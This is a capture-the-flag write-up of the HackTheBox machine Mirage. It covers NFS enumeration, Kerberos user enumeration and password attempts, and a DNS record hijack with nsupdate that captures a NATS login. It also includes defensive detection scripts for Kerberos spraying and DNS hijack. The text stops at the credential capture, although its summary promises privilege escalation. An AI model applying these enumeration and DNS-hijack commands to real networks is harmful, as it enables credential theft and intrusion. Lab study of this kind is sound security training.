
HackTheBox - Mirage

Mirage starts at the NFS service, where two files were found describing configurations, commands and software in use. A DNS server setting that allowed adding records was identified; this made it possible to capture credentials for the NATS server, from which another pair of credentials was then extracted to gather information for BloodHound. Analysing that data gave access to several users through groups, users and permissions. Finally, the configuration and requirements to exploit ESC10 were identified in order to escalate privileges.

Name: Mirage
OS: Windows
Points: Retired
Difficulty: Hard
Release date: 2025-07-19
IP: 10.10.11.78
Makers: EmSec, ctrlzero
User rated difficulty (votes from Cake to BrainFuck): 64, 14, 63, 201, 312, 389, 757, 524, 179, 133

Recon

nmap

nmap shows multiple open ports: dns (53), kerberos (88), http (80), nfs (111), ldap (389), smb (445), winrm (5985), ntp (123).

# Nmap 7.95 scan initiated Thu Jul 24 15:27:19 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,111,135,139,389,445,464,593,636,2049,3268,3269,4222,5985,9389,47001,49664,49665,49666,49667,49668,54308,56003,56011,56012,56025,56030,56053,56070 -sV -sC -oN nmap_scan 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.25s latency).

PORT      STATE SERVICE         VERSION
53/tcp    open  domain          (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec    Microsoft Windows Kerberos (server time: 2025-07-25 04:27:37Z)
111/tcp   open  rpcbind         2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
135/tcp   open  msrpc           Microsoft Windows RPC
139/tcp   open  netbios-ssn     Microsoft Windows netbios-ssn
389/tcp   open  ldap            Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http      Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
2049/tcp  open  status          1 (RPC #100024)
3268/tcp  open  ldap            Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
3269/tcp  open  ssl/ldap        Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: 
| Subject Alternative Name: DNS:dc01.mirage.htb, DNS:mirage.htb, DNS:MIRAGE
| Not valid before: 2025-07-04T19:58:41
|_Not valid after:  2105-07-04T19:58:41
|_ssl-date: TLS randomness does not represent time
4222/tcp  open  vrml-multi-use?
| fingerprint-strings: 
|   GenericLines: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":216,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   GetRequest: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":217,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   HTTPOptions: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":218,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|     -ERR 'Authorization Violation'
|   NULL: 
|     INFO {"server_id":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","server_name":"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V","version":"2.11.3","proto":1,"git_commit":"a82cfda","go":"go1.24.2","host":"0.0.0.0","port":4222,"headers":true,"auth_required":true,"max_payload":1048576,"jetstream":true,"client_id":215,"client_ip":"10.10.14.104","xkey":"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4"} 
|_    -ERR 'Authentication Timeout'
5985/tcp  open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf          .NET Message Framing
47001/tcp open  http            Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc           Microsoft Windows RPC
49665/tcp open  msrpc           Microsoft Windows RPC
49666/tcp open  msrpc           Microsoft Windows RPC
49667/tcp open  msrpc           Microsoft Windows RPC
49668/tcp open  msrpc           Microsoft Windows RPC
54308/tcp open  msrpc           Microsoft Windows RPC
56003/tcp open  msrpc           Microsoft Windows RPC
56011/tcp open  ncacn_http      Microsoft Windows RPC over HTTP 1.0
56012/tcp open  msrpc           Microsoft Windows RPC
56025/tcp open  msrpc           Microsoft Windows RPC
56030/tcp open  msrpc           Microsoft Windows RPC
56053/tcp open  msrpc           Microsoft Windows RPC
56070/tcp open  msrpc           Microsoft Windows RPC
2 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port53-TCP:V=7.95%I=7%D=7/24%Time=6882A550%P=x86_64-pc-linux-gnu%r(DNS-
SF:SD-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04
SF:_udp\x05local\0\0\x0c\0\x01");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port4222-TCP:V=7.95%I=7%D=7/24%Time=6882A53D%P=x86_64-pc-linux-gnu%r(NU
SF:LL,1D1,"INFO\x20{\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LN
SF:YJS5LRV5UQ4K6OGV4V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKM
SF:NH44LNYJS5LRV5UQ4K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_c
SF:ommit\":\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"por
SF:t\":4222,\"headers\":true,\"auth_required\":true,\"max_payload\":104857
SF:6,\"jetstream\":true,\"client_id\":215,\"client_ip\":\"10\.10\.14\.104\
SF:",\"xkey\":\"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"
SF:}\x20\r\n-ERR\x20'Authentication\x20Timeout'\r\n")%r(GenericLines,1D2,"
SF:INFO\x20{\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5
SF:UQ4K6OGV4V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJ
SF:S5LRV5UQ4K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":
SF:\"a82cfda\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222
SF:,\"headers\":true,\"auth_required\":true,\"max_payload\":1048576,\"jets
SF:tream\":true,\"client_id\":216,\"client_ip\":\"10\.10\.14\.104\",\"xkey
SF:\":\"XARPK62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\
SF:n-ERR\x20'Authorization\x20Violation'\r\n")%r(GetRequest,1D2,"INFO\x20{
SF:\"server_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4
SF:V\",\"server_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4
SF:K6OGV4V\",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda
SF:\",\"go\":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"header
SF:s\":true,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":t
SF:rue,\"client_id\":217,\"client_ip\":\"10\.10\.14\.104\",\"xkey\":\"XARP
SF:K62ROKWPWOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\n-ERR\x20
SF:'Authorization\x20Violation'\r\n")%r(HTTPOptions,1D2,"INFO\x20{\"server
SF:_id\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V\",\"se
SF:rver_name\":\"NC7TTSOI23UOF6BU6AAUWJAWZNVHHTKMNH44LNYJS5LRV5UQ4K6OGV4V\
SF:",\"version\":\"2\.11\.3\",\"proto\":1,\"git_commit\":\"a82cfda\",\"go\
SF:":\"go1\.24\.2\",\"host\":\"0\.0\.0\.0\",\"port\":4222,\"headers\":true
SF:,\"auth_required\":true,\"max_payload\":1048576,\"jetstream\":true,\"cl
SF:ient_id\":218,\"client_ip\":\"10\.10\.14\.104\",\"xkey\":\"XARPK62ROKWP
SF:WOZFGSH26JXAVNQL7Z7EI2TKDHM6XURUQPRWQPPRQRE4\"}\x20\r\n-ERR\x20'Authori
SF:zation\x20Violation'\r\n");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-07-25T04:28:41
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 24 15:29:08 2025 -- 1 IP address (1 host up) scanned in 108.33 seconds

# Nmap 7.95 scan initiated Thu Jul 24 15:27:00 2025 as: /usr/lib/nmap/nmap -sU -sVC --min-rate 10000 -oN nmap_scan_udp 10.10.11.78
Nmap scan report for 10.10.11.78
Host is up (0.25s latency).
Not shown: 991 open|filtered udp ports (no-response)
PORT      STATE  SERVICE      VERSION
53/udp    open   domain       Simple DNS Plus
88/udp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2025-07-25 04:27:08Z)
111/udp   open   rpcbind      2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/tcp6  rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  2,3,4        111/udp6  rpcbind
|   100003  2,3         2049/udp   nfs
|   100003  2,3         2049/udp6  nfs
|   100003  2,3,4       2049/tcp   nfs
|   100003  2,3,4       2049/tcp6  nfs
|   100005  1,2,3       2049/tcp   mountd
|   100005  1,2,3       2049/tcp6  mountd
|   100005  1,2,3       2049/udp   mountd
|   100005  1,2,3       2049/udp6  mountd
|   100021  1,2,3,4     2049/tcp   nlockmgr
|   100021  1,2,3,4     2049/tcp6  nlockmgr
|   100021  1,2,3,4     2049/udp   nlockmgr
|   100021  1,2,3,4     2049/udp6  nlockmgr
|   100024  1           2049/tcp   status
|   100024  1           2049/tcp6  status
|   100024  1           2049/udp   status
|_  100024  1           2049/udp6  status
123/udp   open   ntp          NTP v3
| ntp-info: 
|_  
389/udp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: mirage.htb0., Site: Default-First-Site-Name)
2049/udp  open   nlockmgr     1-4 (RPC #100021)
18250/udp closed unknown
20309/udp closed unknown
49167/udp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port111-UDP:V=7.95%I=7%D=7/24%Time=6882A531%P=x86_64-pc-linux-gnu%r(ONC
SF:RPC_CALL,18,">\xec\xe3\xca\0\0\0\x01\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\x01"
SF:);
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 7h00m14s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jul 24 16:06:11 2025 -- 1 IP address (1 host up) scanned in 2350.74 seconds

We add mirage.htb and dc01.mirage.htb to our /etc/hosts file.

NFS

showmount shows one export, accessible to everyone.

❯ showmount -e mirage.htb
Export list for mirage.htb:
/MirageReports (everyone)

We mount the share locally; two PDFs are listed.

❯ mkdir mirage_mount
❯ sudo mount -t nfs mirage.htb:/MirageReports mirage_mount/ -o nolock
❯ ls -lah mirage_mount
drwxrwxrwx nobody nogroup  64 B  Mon May 26 15:41:57 2025  .
drwxrwxr-x kali   kali    4.0 KB Thu Jul 24 15:32:26 2025  ..
.rwx------ nobody nogroup 8.1 MB Tue May 20 09:08:12 2025  Incident_Report_Missing_DNS_Record_nats-svc.pdf
.rwx------ nobody nogroup 8.9 MB Mon May 26 15:37:21 2025  Mirage_Authentication_Hardening_Report.pdf
❯ exiftool Incident_Report_Missing_DNS_Record_nats-svc.pdf
ExifTool Version Number         : 13.25
File Name                       : Incident_Report_Missing_DNS_Record_nats-svc.pdf
Directory                       : .
File Size                       : 8.5 MB
File Modification Date/Time     : 2025:07:24 15:35:02-06:00
File Access Date/Time           : 2025:07:24 15:34:58-06:00
File Inode Change Date/Time     : 2025:07:24 15:35:30-06:00
File Permissions                : -rwxrwxrwx
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 4
Tagged PDF                      : Yes
Language                        : en-PH
Title                           : Investigative Reporting Outline Doc in Black Grey Teal Modern Type Style
Creator                         : Canva
Producer                        : Canva
Create Date                     : 2025:05:20 15:07:45+00:00
Modify Date                     : 2025:05:20 15:07:45+00:00
Keywords                        : DAGn7vmxkJQ, BAFmAHycaxU, 0
Author                          : Mostafa Toumi (EmSec)
❯ exiftool Mirage_Authentication_Hardening_Report.pdf
ExifTool Version Number         : 13.25
File Name                       : Mirage_Authentication_Hardening_Report.pdf
Directory                       : .
File Size                       : 9.4 MB
File Modification Date/Time     : 2025:07:24 15:35:07-06:00
File Access Date/Time           : 2025:07:24 15:35:03-06:00
File Inode Change Date/Time     : 2025:07:24 15:35:30-06:00
File Permissions                : -rwxrwxrwx
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.4
Linearized                      : No
Page Count                      : 5
Tagged PDF                      : Yes
Language                        : en-PH
Title                           : Copy of Investigative Reporting Outline Doc in Black Grey Teal Modern Type Style
Creator                         : Canva
Producer                        : Canva
Create Date                     : 2025:05:26 21:36:48+00:00
Modify Date                     : 2025:05:26 21:36:48+00:00
Keywords                        : DAGoYb7hCCM, BAFmAHycaxU, 0
Author                          : Mostafa Toumi (EmSec)

Missing DNS Record

The first PDF (Incident_Report_Missing_DNS_Record_nats-svc.pdf) reports that the subdomain nats-svc.mirage.htb, where the NATS messaging system runs, is no longer available; the cause is 'scavenging', a DNS server setting that removes records, left at its default configuration.

An image shows an authentication attempt against that service, along with the username Dev_Account_A, whose form suggests some kind of naming convention.

image

The configuration is shown with Dynamic Updates set to Nonsecure and secure, which would allow any 'user' to register or update a DNS record. (Question about secure and unsecure DNS registration, Don't Get Hijacked: Prevalence, Mitigation, and Impact of Non-Secure DNS Dynamic Updates).

image

Finally, it notes that nats-svc.mirage.htb 'could' be hardcoded in applications that may still be connecting to it, and that a hijack of this subdomain could expose information.

Deprecated NTLM

The second PDF (Mirage_Authentication_Hardening_Report.pdf) mainly mentions NTLM as a deprecated authentication type and that Mirage is 'upgrading' to Kerberos authentication. The goal is to move the whole domain to this authentication type by 2025.

A possible username is seen at the end: ad-security.

Active Directory Security Team
IT Security Department – Mirage.htb
Contact: ad-security@mirage.htb


Enumerating Users

Based on the user naming convention seen in the PDFs and other possible usernames, we build a wordlist.

❯ cat users.txt
Dev_Account_A
Dev_Account_B
Dev_Account_C
Dev_Account_D
Dev_Account_E
Dev_Account_F
Dev_Account_G
ad-security
nats-svc
nats_svc

kerbrute shows only two valid usernames.

❯ ~/htb/tools/kerbrute userenum --dc dc01.mirage.htb -d mirage.htb users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 07/24/25 - Ronnie Flathers @ropnop

2025/07/24 16:43:05 >  Using KDC(s):
2025/07/24 16:43:05 >  	dc01.mirage.htb:88

2025/07/24 16:43:05 >  [+] VALID USERNAME:	Dev_Account_B@mirage.htb
2025/07/24 16:43:05 >  [+] VALID USERNAME:	Dev_Account_A@mirage.htb
2025/07/24 16:43:05 >  Done! Tested 10 usernames (2 valid) in 0.252 seconds

Using the username as the password does not yield any valid login.

❯ faketime "$(ntpdate -q mirage.htb | cut -d ' ' -f 1,2)" netexec smb dc01.mirage.htb -u valid_users.txt -p valid_users.txt -k
SMB         dc01.mirage.htb 445    dc01             [*]  x64 (name:dc01) (domain:mirage.htb) (signing:True) (SMBv1:False) (NTLM:False)
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_A:Dev_Account_A KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_B:Dev_Account_A KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_A:Dev_Account_B KDC_ERR_PREAUTH_FAILED 
SMB         dc01.mirage.htb 445    dc01             [-] mirage.htb\Dev_Account_B:Dev_Account_B KDC_ERR_PREAUTH_FAILED 
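
On the domain controller, the kerbrute userenum run and the KDC_ERR_PREAUTH_FAILED results above leave a distinctive trail in the Security log. The following added example (my code, not part of the original write-up or of kerbrute/netexec) shows how a defender would pick that trail out of constructed records shaped like events 4768 (TGT request, Result Code 0x6 = client principal unknown) and 4771 (pre-authentication failed, Failure Code 0x18 = wrong password). The field names follow the event XML (TargetUserName, IpAddress, Status); the thresholds and window are assumptions to tune per environment.

```python
"""Detect Kerberos user enumeration and password spraying from DC Security events.

Added example, not part of the original write-up. The records below are
constructed to resemble the fields of Windows Security events 4768 (TGT
request; Result Code 0x6 = client principal unknown) and 4771 (Kerberos
pre-authentication failed; Failure Code 0x18 = wrong password). They are not
real logs from the box.
"""
from collections import defaultdict
from datetime import datetime

SOURCE = "10.10.14.104"  # the scanning host in this page's output

# Constructed sample events (not real DC logs).
SAMPLE_EVENTS = [
    # Eight names that do not exist, tried within one second: a userenum burst
    *[{"EventID": 4768, "TimeCreated": "2025-07-24T16:43:05", "IpAddress": SOURCE,
       "TargetUserName": n, "Status": "0x6"}
      for n in ["Dev_Account_C", "Dev_Account_D", "Dev_Account_E", "Dev_Account_F",
                "Dev_Account_G", "ad-security", "nats-svc", "nats_svc"]],
    # The same host later tries passwords against two valid accounts
    {"EventID": 4771, "TimeCreated": "2025-07-24T16:50:10", "IpAddress": SOURCE,
     "TargetUserName": "Dev_Account_A", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2025-07-24T16:50:10", "IpAddress": SOURCE,
     "TargetUserName": "Dev_Account_B", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2025-07-24T16:50:11", "IpAddress": SOURCE,
     "TargetUserName": "Dev_Account_A", "Status": "0x18"},
    {"EventID": 4771, "TimeCreated": "2025-07-24T16:50:11", "IpAddress": SOURCE,
     "TargetUserName": "Dev_Account_B", "Status": "0x18"},
    # Benign noise: one user mistypes a password once, then gets a TGT
    {"EventID": 4771, "TimeCreated": "2025-07-24T16:45:00", "IpAddress": "10.10.11.50",
     "TargetUserName": "david.jjackson", "Status": "0x18"},
    {"EventID": 4768, "TimeCreated": "2025-07-24T16:45:01", "IpAddress": "10.10.11.50",
     "TargetUserName": "david.jjackson", "Status": "0x0"},
]


def analyze(events, window_seconds=60, enum_threshold=5, spray_threshold=2):
    """Bucket failures per source address and fixed time window.

    Returns one finding per (source, window) that crosses a threshold:
    - user_enumeration: >= enum_threshold distinct unknown principals (4768/0x6)
    - password_spray:   >= spray_threshold distinct accounts with a bad
                        password (4771/0x18) from the same source
    """
    buckets = defaultdict(lambda: {"unknown": set(), "badpw": set()})
    for e in events:
        ts = int(datetime.fromisoformat(e["TimeCreated"]).timestamp())
        key = (e["IpAddress"], ts // window_seconds)
        if e["EventID"] == 4768 and e["Status"] == "0x6":
            buckets[key]["unknown"].add(e["TargetUserName"])
        elif e["EventID"] == 4771 and e["Status"] == "0x18":
            buckets[key]["badpw"].add(e["TargetUserName"])

    findings = []
    for (ip, _), b in sorted(buckets.items()):
        if len(b["unknown"]) >= enum_threshold:
            findings.append({"source": ip, "type": "user_enumeration",
                             "count": len(b["unknown"]), "names": sorted(b["unknown"])})
        if len(b["badpw"]) >= spray_threshold:
            findings.append({"source": ip, "type": "password_spray",
                             "count": len(b["badpw"]), "names": sorted(b["badpw"])})
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['source']} {f['type']} ({f['count']}): {', '.join(f['names'])}")
```

The AS-REQ for a name that does exist is answered with KDC_ERR_PREAUTH_REQUIRED, which is part of the normal exchange, so the reliable enumeration signal is the burst of unknown-principal failures from one source, not the hits. Counting distinct accounts per source also separates a spray from a single user fumbling a password, which is why the benign 10.10.11.50 records produce nothing.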

DNS Update and Catching Credentials

The DNS server is configured to let any user update or create DNS records, so we use nsupdate to delete and add a record on the server, pointing the subdomain nats-svc.mirage.htb at our IP address. Our update file looks as follows:

server 10.10.11.78
zone mirage.htb.
update delete nats-svc.mirage.htb. A
update add nats-svc.mirage.htb. 3600 A 10.10.14.104
send
; source: chatgpt

After passing the file to nsupdate, we verify that the record exists.

nsupdate -v update.txt
dig @10.10.11.78 nats-svc.mirage.htb A +short

The record does not exist at first; after running the update and checking again with dig we see that nats-svc.mirage.htb now points to our IP.

❯ dig @10.10.11.78 nats-svc.mirage.htb A +short
❯ nsupdate -v update.txt
❯ dig @10.10.11.78 nats-svc.mirage.htb A +short
10.10.14.104
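
Both failure modes from the incident report and from the update above are cheap to watch for: a protected name that has stopped resolving (scavenged, and therefore free for anyone to re-create) and a protected name that resolves outside the networks the service is allowed to live in. The following added example (my code, not from the original write-up) checks constructed answer snapshots, mirroring the dig output on this page, against a small policy; a real monitor would fill the snapshots from live lookups against the authoritative server. The policy networks are assumptions.

```python
"""Watch protected DNS names for scavenging loss and hijack.

Added example, not from the original write-up. The answer snapshots are
constructed to mirror the dig output on this page.
"""
import ipaddress

# Policy (assumed for this example): protected names and the networks their
# A records are allowed to point into.
POLICY = {
    "nats-svc.mirage.htb": ["10.10.11.0/24"],
    "dc01.mirage.htb": ["10.10.11.0/24"],
}

# Constructed answer snapshots: name -> list of A records returned.
SNAPSHOT_SCAVENGED = {"dc01.mirage.htb": ["10.10.11.78"]}  # nats-svc record gone
SNAPSHOT_HEALTHY = {"dc01.mirage.htb": ["10.10.11.78"],
                    "nats-svc.mirage.htb": ["10.10.11.78"]}
SNAPSHOT_HIJACKED = {"dc01.mirage.htb": ["10.10.11.78"],
                     "nats-svc.mirage.htb": ["10.10.14.104"]}


def check_snapshot(policy, answers):
    """Return (name, problem, address) tuples for every policy violation."""
    findings = []
    for name, allowed in policy.items():
        nets = [ipaddress.ip_network(n) for n in allowed]
        addrs = answers.get(name, [])
        if not addrs:
            # A missing record is what lets anyone re-create it unchallenged
            findings.append((name, "missing", None))
            continue
        for addr in addrs:
            ip = ipaddress.ip_address(addr)
            if not any(ip in net for net in nets):
                findings.append((name, "outside_allowed_range", addr))
    return findings


def diff_snapshots(old, new):
    """Names whose answer set changed between two polls, as (name, old, new)."""
    changed = []
    for name in sorted(set(old) | set(new)):
        before, after = sorted(old.get(name, [])), sorted(new.get(name, []))
        if before != after:
            changed.append((name, before, after))
    return changed


if __name__ == "__main__":
    for label, snap in [("scavenged", SNAPSHOT_SCAVENGED), ("healthy", SNAPSHOT_HEALTHY),
                        ("hijacked", SNAPSHOT_HIJACKED)]:
        print(label, check_snapshot(POLICY, snap))
    print("drift:", diff_snapshots(SNAPSHOT_SCAVENGED, SNAPSHOT_HIJACKED))
```

Monitoring only catches the symptom. The fixes are on the server: set the zone's dynamic updates to secure only so that updates must be authenticated, and keep records for critical services static, since scavenging only ages out timestamped dynamic records, or exclude such zones from scavenging altogether. The stale hardcoded hostname in the client application is the remaining root cause.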

NATS System Message

NATS runs on port 4222, so after registering the record we set netcat listening on that port and receive a connection from the server.

❯ nc -lvvvp 4222
listening on [any] 4222 ...
connect to [10.10.14.104] from mirage.htb [10.10.11.78] 59550
 sent 0, rcvd 0

We install the NATS server locally to monitor traffic on port 4222.

❯ sudo dpkg -i nats-server-v2.11.6-amd64.deb
[sudo] password for kali: 
Selecting previously unselected package nats-server.
(Reading database ... 564328 files and directories currently installed.)
Preparing to unpack nats-server-v2.11.6-amd64.deb ...
Unpacking nats-server (2.11.6) ...
Setting up nats-server (2.11.6) ...
Processing triggers for kali-menu (2025.2.7) ...

Running nats-server with the -V flag shows an authentication from mirage as the user Dev_Account_A; the password is not shown, and the client reports that TLS is not required.

❯ nats-server -V
[89096] 2025/07/24 16:37:48.188034 [INF] Starting nats-server
[89096] 2025/07/24 16:37:48.188100 [INF]   Version:  2.11.6
[89096] 2025/07/24 16:37:48.188104 [INF]   Git:      [bc813ee]
[89096] 2025/07/24 16:37:48.188106 [INF]   Name:     NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX
[89096] 2025/07/24 16:37:48.188108 [INF]   ID:       NCDNCNVFKHC2CR2EKT6XQ7GOFXVHY26SKDD6JTDLLA3WTS4HE4BLR3DX
[89096] 2025/07/24 16:37:48.188557 [INF] Listening for client connections on 0.0.0.0:4222
[89096] 2025/07/24 16:37:48.188867 [INF] Server is ready
[89096] 2025/07/24 16:38:02.973578 [TRC] 10.10.11.78:56026 - cid:5 - <<- [CONNECT {"verbose":false,"pedantic":false,"user":"Dev_Account_A","pass":"[REDACTED]","tls_required":false,"name":"NATS CLI Version 0.2.2","lang":"go","version":"1.41.1","protocol":1,"echo":true,"headers":true,"no_responders":true}]
[89096] 2025/07/24 16:38:02.973764 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:02.973792 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.247245 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.247289 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.495382 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.495417 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.743772 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.743808 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
[89096] 2025/07/24 16:38:03.991746 [TRC] 10.10.11.78:56026 - cid:5 - <<- [PING]
[89096] 2025/07/24 16:38:03.991766 [TRC] 10.10.11.78:56026 - cid:5 - ->> [PONG]
